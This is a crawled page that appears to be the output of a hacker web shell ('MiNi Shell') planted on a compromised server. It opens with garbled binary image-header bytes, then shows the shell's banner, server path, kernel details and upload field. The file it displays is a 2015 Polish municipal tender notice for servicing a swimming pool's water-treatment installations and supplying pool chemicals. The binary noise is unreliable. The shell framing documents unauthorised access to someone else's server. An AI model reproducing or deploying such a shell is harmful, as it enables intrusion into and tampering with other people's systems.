JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150203/14737-N-2015.html

<p class="kh_header"><b>Kowalewo Pomorskie: Wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu - Pływalnia wraz z dostawą specjalistycznych środków chemicznych na okres  od 01.03.2015 do 31.08.2016 roku.</b><br>
<b>Numer ogłoszenia: 14737 - 2015; data zamieszczenia: 03.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kowalewo Pomorskie , Plac  Wolności 1, 87-410 Kowalewo Pomorskie, woj. kujawsko-pomorskie, tel. 056 6841024, faks 056 6841071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kowalewopomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu - Pływalnia wraz z dostawą specjalistycznych środków chemicznych na okres  od 01.03.2015 do 31.08.2016 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia 
Wykonanie obsługi technicznej instalacji technologicznych Centrum Rekreacji i Sportu
 -Pływalnia wraz z dostawą specjalistycznych środków chemicznych na okres od 01.03.2015 do 30.08.2016 roku.
Wykonawca w trakcie wykonywania ma obowiązek zapoznania się z dokumentacją oraz z postępowaniem zgodnie  z wytycznymi znajdującymi się w dokumentach pływalni tak by nie spowodować utraty gwarancji.

3.1 Zleceniodawca  zapewni we własnym zakresie wszystkie środki chemiczne, materiały eksploatacyjne, a także narzędzia pracy niezbędne do wykonania zamówienia, w tym
w szczególności: środki do uzdatniania wody basenowej, dezynsekcji i dezynfekcji niecek basenowych i instalacji basenowych. Wartość tych środków, materiałów i narzędzi jest wliczona w wynagrodzenie w § 6 pkt 1 umowy.
3.2 Do zadań Wykonawcy należeć będzie:
3.2.1  Obsługa basenu 
 	1.  Kontrola systemu podgrzewania wody.
	2.  Uzdatnianie chemiczne wody zgodnie z zaleceniami Sanepidu oraz PZH.
	3.  Czyszczenie niecki pływalni  ( środki do czyszczenia obciążają Wykonawcę).
	4.  Dodatkowa szokowa dezynfekcja filtrów min. 2 x w tygodniu.
	5.  Płukanie ekstra filtrów wg. wskazanej różnicy ciśnień.
	6.  Kalibracja systemu uzdatniania wody min. 1 x dziennie.
	7.  Obsługa instalacji i urządzeń dezynfekujących stopy ( nogomyje) - 1 x dziennie.
	8.  Obsługa instalacji elektrycznej, zasilającej urządzenia systemu uzdatniania wody 
    	basenowej ( szafy sterownicze -automatyka basenu sztuk 4, transformatory	oświetlenia  	podwodnego, szafy automatyki lamp  UV - 4 sztuki, elektrozawory	przy wymiennikach ciepła - 4 sztuki, zdalne sterowanie atrakcjami basenowymi-	szafy ), w tym wymiana żarówek oświetlenia podwodnego.
	9.  Ręczne czyszczenie ścian i linii wody oraz usuwanie zanieczyszczeń nie dających	się usunąć przy pomocy maszyn.
	10. Badanie właściwości fizykochemicznych i bakteriologicznych zgodnie z 	wytycznymi Głównego Inspektoratu Sanitarnego w sprawie wymagań jakości wody	oraz warunków  sanitarno-higienicznych na pływalniach.
3.2.2 Charakterystyka  liczbowa obiegów basenowych.
Obieg
Opis basenu
Lustro wody [m2]
Głębokość [m]
Objętość niecki [m3]
Obciążenie max. [os/h]
T
[°C]

Wydajność
[m3/h]


I
Pływacki 25x 12,5
312,5
1,35 - 1,80
 492
24
26
139
II



III
Basen rekreacyjny
12,5x8,0
100
0,80-1,1
95
25
30
92

Brodzik dla dzieci
7,0 x 6,0
42
0,15-0,50
12,4
10
32
32
IV
Wanna z hydromasażem okrągła 2,83
6,3
0,4-0,9
1,4
6
34
28
Łącznie baseny
460,8
---
600,8
65
---
291

3.2.3 Bieżąca obsługa urządzeń
1.  Codzienne badanie parametrów wody min. 4 x dziennie.
2.  Czyszczenie systemów dozujących i sprawdzenie ich funkcjonowania 1 x  w tygodniu. 
3.  Usuwanie ewentualnych usterek w ramach obsługi.
4.  Kalibracja elektrod pomiarowych (sond) pH   2 x w tygodniu.
5.  Kalibracja elektrod pomiarowych (sond) redox 2 x w tygodniu.
6.  Kalibracja elektrod pomiarowych (sond) chloru  2 x  w tygodniu.
3.2.4 Stacja kontroli parametrów wody - bieżąca obsługa urządzenia
1.  Kalibracja urządzenia według codziennych pomiarów wody.
2.  Regulacja dopływu wody według zawartości w wodzie chloru związanego
3.  Codzienna kontrola zawartości chloru w wodzie na pływalni. Wykonawca musi posiadać fotometr elektroniczny z interfejsem.
4.  Regulacja czynnika pH w wodzie.
5.  Kontrola odczytu parametru redox.
6.  Wymiana elementów pomiarowych według potrzeb wraz z kalibracją sąd pomiarowych wg zużycia.
3.2.5 Obsługa technologicznego ciepła wody basenowej
1.  Bieżąca kontrola przepływu na wymiennikach ciepła.
2.  Bieżące czyszczenie i odpowietrzanie układu.
3.  Regulacja temperatury wody wg aktualnych potrzeb oraz na wskazanie Kierownika Centrum 
3.2.6 Układ dozowania środków chemicznych
1.  Kontrola pomp dozujących środki chemiczne  min. 4 x dziennie.
2.  Kontrola i czyszczenie zaworów dozujących chemię do układu basenowego  1 x w tygodniu.
3.  Wymiana środków chemicznych w układzie dozującym wg zużycia.
4. Czyszczenie zaworów dozujących pH, CL, koagulant 1 x tydzień.
3.2.7 Filtrowanie 
1.  Płukanie filtrów basenowych według potrzeb tj. w zależności od obciążenia basenu  (według wskazań na manometrach).
2.  Usuwanie zanieczyszczeń stałych z sit filtracyjnych pomp obiegowych min. 2 x wtygodniu.
3.  Chlorowanie filtrów 2 x w tygodniu.
3.2.8 Lampy UV
1.  Kontrola pracy lamp 3 UV min 4 x dziennie.
2.  Ewentualna wymiana żarnika lamp UV.
3.2.9 Zbiornik wyrównawczy oraz zbiornik wód popłucznych
1.  Kontrola dopływu wody do basenu i poziomu wody w zbiornikach wyrównawczych  zgodnie z wytycznymi Głównego Inspektoratu Sanitarnego w sprawie wymagań jakości   wody oraz warunków sanitarno-higienicznych na pływalniach.
2.  Czyszczenie zbiorników wyrównawczych oraz zbiornika wód popłucznych według   możliwości technologicznej /ewentualne  przerwy technologiczne w trakcie  funkcjonowania basenu ( koszty środków chemicznych pokrywa Wykonawca).
3.2.10 Bieżąca kontrola pracy urządzeń wentylacyjnych ( hala basenowa, pomieszczenia techniczne, podbasenie) MENERGA
1.  Falowniki sterujące pracą wentylacji  hali basenowej i pomieszczeń technicznych 1 x  dziennie.
2.  Kontrola pracy szaf sterujących układem nawiewu szatni męskiej i damskiej, hali basenowej, suszarek, nawiewu podbasenia centrali 1 x dziennie.
3.  Kontrola pracy wentylatorów 1 x dziennie.
3.2.11 Prowadzenie dokumentacji związanej z obsługą 
1.  Prowadzenie dokumentacji zgodnie z wytycznymi Głównego Inspektoratu Sanitarnegow  sprawie wymagań jakości  wody oraz warunków sanitarno-higienicznych  na pływalniach
2.  Sporządzanie protokołu usterek w przypadku zaistniałych poważnych usterek związanych   z gwarancją poszczególnych elementów lub też usterek wynikających z bieżącej  eksploatacji basenu, prowadzenie dokumentacji związanej z zawartością chloru  związanego w wodzie na pływali.
3.  Na koniec miesiąca, kierownik Centrum otrzyma pisemny raport parametrów wody basenowej i poszczególnych pomiarów ciśnień, temperatury i twardości wody, w celu udokumentowania prawidłowości funkcjonowania obiektu.
4.  W przypadku niewłaściwej pracy poszczególnych urządzeń kierownik Centrum będzie  powiadamiany pisemnie natychmiastowo o nieprawidłowościach.                                    
5.Wykonawca zobowiązany jest do codziennego zapisywania w dzienniku wartości: pH, chloru i redox, wskazywanych przez komputer sterujący, oraz do prowadzenia księgi
rozchodów wody.
3.2.12 Czyszczenie niecki basenowej.
1. Odkurzanie niecki basenu, według harmonogramu - min. 4 razy w miesiącu (min. 1 w  tygodniu). Zamawiający zapewnia sprzęt do wykonania usługi.
2. Usuwanie nieczystości z wody basenowej w razie potrzeb. Zamawiający nie zapewnia sprzętu do wykonania usługi.
3. W czasie realizacji przedmiotu zamówienia, raz w roku, należy przewidzieć przerwę technologiczną, po uzgodnieniu z Zamawiającym. Wykonawca musi w tym czasie wyłączyć stację uzdatniania wody, opróżnić niecki, wykonać konserwację instalacji, napełnić niecki wodą i uruchomić ponownie instalację uzdatniania wody basenowej
3.2.13 Dostawa chemii basenowej
1.  Minimalny termin ważności substancji (gwarancji ) wymagany przez Zamawiającego wynosi 6 miesięcy i liczony będzie od dnia każdej dostawy chemii basenowej.
2. Wykonawca zobowiązuje się do sporządzania szczegółowego, miesięcznego wykazu chemii i środków użytych do obsługi instalacji uzdatniania wody basenowej.
3. Wykonawca zobowiaząny jest do dostarczania następujacych środków  w ilości:
podchloryn sodu - 1000 kg/m-c
korektor pH na bazie kwasu siarkowego o stężeniu 49 - 50 %, zawierający inhibitory przeciwko korozji - 400 kg/m-c
środek do koagulacji wody basenowej na bazie polihydroksychlorku glinu o stężeniu minimum 5 % -  60 l/m-c
preparat do zwalczania glonów, bakterii i grzybów, zawierający minimum 30 % amin czwartorzędowych- 30 l/m-c
Multitabletki chlorowe  - 1 op. 
 Bufory pH, redox - 1 op
Preparat do obniżania stężenia Cl w wodzie basenowej- 1 op.
Preparat do czyszczenia i konserwacji stali kwasoodporne - 1 op.
Podana ilość jest wielkością orientacyjną, do dostosowania wyceny zamówienia. Zmiana tych ilości nie będzie rodzić skutków ujemnych dla Wykonawcy i Zamawiającego.
3.  Zamawiający wymaga, by środki chemii basenowej były dostarczane w oryginalnych dla danego produktu opakowaniach, zaopatrzone w karty charakterystyki, znak firmowy i nazwę producenta.
4.  W instalacji uzdatniania wody basenowej należy używać podchlorynu sodu, stabilizowanego, o zawartości minimum 14 % chloru aktywnego, przeznaczonego do dezynfekcji wody basenowej, pitnej i powierzchni, zgodnie z pozwoleniem Ministra Zdrowia lub Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych, Produktów Biobójczych.
5.  Korektor pH, na bazie kwasu siarkowego o stężeniu 49 - 50 %, zawierający inhibitory przeciwko korozji. Preparat zgłoszony do Inspektora ds. Substancji Chemicznych.
6.  Środek do koagulacji wody basenowej na bazie polihydroksychlorku glinu o stężeniu minimum 5 %. Produkt nie może być sklasyfikowany jako niebezpieczny w myśl obowiązujących przepisów.
7.  Preparat do zwalczania glonów, bakterii i grzybów, zawierający minimum 30 % amin czwartorzędowych  zgodnie z pozwoleniem Ministra Zdrowia lub Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych, Produktów Biobójczych.
8.  Multitabletki chlorowe.
9.  Bufory pH, redox.
10. Preparat do obniżania stężenia Cl w wodzie basenowej.
11. Preparat do czyszczenia i konserwacji stali kwasoodpornej.
Dostawa  środków chemicznych następować będzie na podstawie pisemnego zlecenia Zamawiającego, w którym zostaną określone ilości oraz rodzaje środków chemicznych  oraz termin dostawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.90.00.00-0, 50.50.00.00-0, 50.72.10.00-0, 24.96.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium przed upływem terminu składania ofert w 	wysokości 5 000,00 PLN (słownie złotych: pięć tysięcy, 00/100), w pieniądzu na 	rachunek zamawiającego nr 58 9496 0008 0000 1720 2000 0052 w Banku 	Spółdzielczym Kowalewo Pomorskie lub w jednej z poniżej podanych form:
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,z  tym ,że poręczenie kasy zawsze jest poręczeniem pieniężnym- art.45 ust.6
gwarancjach bankowych,
w gwarancjach ubezpieczeniowych; 
poręczeniach udzielonych przez podmioty; o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Z 2007 r. Nr 42, poz. 275 z późn. zm.)
 Odpowiedni dokument należy dołączyć  do oferty w osobnej kopercie, kopię należy wpiąć do oferty razem z innymi dokumentami. Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego, wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
    21.  W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium. Okoliczności te muszą obejmować zdarzenia wskazane przepisami art.46 ust.4a i ust.5 Ustawy: 
	a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 	Ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 	Ustawy lub pełnomocnictw; 
b) jeżeli Wykonawca, którego oferta została wybrana: 
	- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 	określonych w ofercie; 
	- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 	przyczyn leżących po stronie Wykonawcy.
Poza tym, z powyższego dokumentu powinno wynikać jednoznacznie gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze pisemne żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od terminu składania ofert.
	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo. 
	Brak zabezpieczenia oferty wadium stosownie do wymagań określonych w pkt. 20 SIWZ spowoduje wykluczenie Wykonawcy z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu w tym zakresie, których spełnianie wykonawca
             zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie potencjału technicznego Zamawiający nie precyzuje żadnych wymagań, 	których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  osób  zdolnych  do  wykonania  zamówienia  Zamawiający  uzna 	warunek  za  spełniony  jeżeli:
	Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia zał nr 6 SWIZ, 	które będą uczestniczyć w jego wykonaniu, i które posiadają uprawnienia: 
	a) Świadectwo kwalifikacyjne E, uprawniające do zajmowania się eksploatacją 	urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie niższym niż 1 kV;
	b) Aktualną książeczkę zdrowia do celów sanitarno - epidemiologicznych, wymaganą 	przez Sanepid. 
Na potwierdzenie tego warunku Wykonawca zobowiązany jest do przedłożenia wraz z ofertą wykazu osób wraz z oświadczeniami o których  mowa w pkt 16 SIWZ.
Oceny spełniania tego warunku Zamawiający dokona na podstawie reguły: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien potwierdzić posiadanie  polisy lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej za szkody wyrządzone w związku z wykonywaniem usługi objętej przedmiotowym zamówieniem z sumą ubezpieczenia w kwocie 1 000 000,00 PLN.

Oceny spełniania tego warunku Zamawiający dokona na podstawie  reguły: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy wg wzoru stanowiącego zał. nr 2 do SWIZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin zapłaty - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowalewopomorskie.ornet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ  znajduje się do bezpłatnego  odbioru w  Centrum Rekreacji i Sportu -Pływalnia ul. Jana Pawła II 2a- biuro kierownika.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2015 godzina 12:00, miejsce: URZĄD MIEJSKI 
PLAC WOLNOŚCI 1
87-410 KOWALEWO POMORSKIE
SEKRETARIAT (POKÓJ NR.2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com